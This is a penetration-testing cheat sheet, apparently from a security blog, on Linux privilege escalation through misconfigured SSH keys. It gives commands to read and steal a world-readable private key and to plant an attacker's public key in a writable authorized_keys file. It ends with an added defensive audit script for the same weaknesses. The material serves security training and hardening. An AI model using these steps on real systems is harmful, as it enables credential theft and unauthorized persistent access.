| description |
|---|
| This is a crucial step in post compromise. It also allows for the best-case-scenario shell. |
- Check the permissions on the SSH directories and key files:

ls -la /home /root /etc/ssh /home/*/.ssh/

- If you see permissions like the following (here in the /etc/ssh listing), the private key is readable and you can then hijack it:

/etc/ssh:
-rwxrwxrwx 1 stef stef 565 Feb 16 01:28 id_rsa

- Change into the directory the listing showed the key in:

cd /etc/ssh

- Read the key:

cat id_rsa

- Copy/paste the contents of id_rsa into a file in a directory named after the individual you are stealing the key from:

nano id_rsa (paste the contents of id_rsa in here)

- Restrict the permissions, otherwise ssh refuses to use the key:

chmod 600 id_rsa

- SSH into the machine using the following syntax:

ssh -i id_rsa <user>@<IP>
- If the authorized_keys file is writable by the current user, this can be exploited by adding additional authorized keys. Permissions like the following indicate this:

ls -la /home /root /etc/ssh /home/*/.ssh/

/etc/ssh:
-rwxrwxrwx 1 stef stef 565 Feb 16 01:58 authorized_keys

- The easiest way to exploit this is to generate a new SSH key pair, add the public key to the file and log in using the private key.

# On kali:
ssh-keygen
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa.pub | xclip -selection c

Copy the public key to the host:

# On victim:
echo "ssh-rsa <pub_key_here> kali@kali" >> /home/user/.ssh/authorized_keys
cat /home/user/.ssh/authorized_keys

Connect to the victim via SSH:

ssh user@<IP>

- Note that if the key pair was not generated in the default directory for SSH, the private key can be specified using -i.
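An administrator-side check for the two conditions above (private keys readable by group or other, authorized_keys writable by group or other), added here as an example and not code from the original post. It relies only on POSIX `ls`, `cut` and `case` patterns; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original page: audit an .ssh (or /etc/ssh)
# directory for the two weaknesses described above. Function names are
# hypothetical; only POSIX ls, cut and case patterns are used.

# Print the 10-character mode field of a file, e.g. "-rw-r--r--".
mode_string() {
    ls -ld "$1" | cut -c1-10
}

# Succeed when mode string $1 grants read to group (col 5) or other (col 8).
readable_by_group_or_other() {
    case "$1" in
        ????r*|???????r*) return 0 ;;
    esac
    return 1
}

# Succeed when mode string $1 grants write to group (col 6) or other (col 9).
writable_by_group_or_other() {
    case "$1" in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# Walk one directory and print a finding per exposed file.
# Returns 0 when nothing was found, 1 when at least one finding was printed.
audit_ssh_dir() {
    dir=$1
    found=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        mode=$(mode_string "$f")
        case "${f##*/}" in
            authorized_keys)
                if writable_by_group_or_other "$mode"; then
                    echo "AUTHORIZED_KEYS_WRITABLE $mode $f"; found=1
                fi ;;
            *.pub) ;;                    # public halves are meant to be readable
            id_*|ssh_host_*_key)         # user private keys and sshd host keys
                if readable_by_group_or_other "$mode"; then
                    echo "PRIVATE_KEY_READABLE $mode $f"; found=1
                fi ;;
        esac
    done
    [ "$found" -eq 0 ]
}

# Usage, over the same paths the ls command above inspects:
# for d in /root/.ssh /home/*/.ssh /etc/ssh; do [ -d "$d" ] && audit_ssh_dir "$d"; done
```

A non-zero exit makes the check usable from a cron job or configuration-management run; the fix for each finding is `chmod 600` on the reported file.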
https://steflan-security.com/linux-privilege-escalation-exploiting-misconfigured-ssh-keys/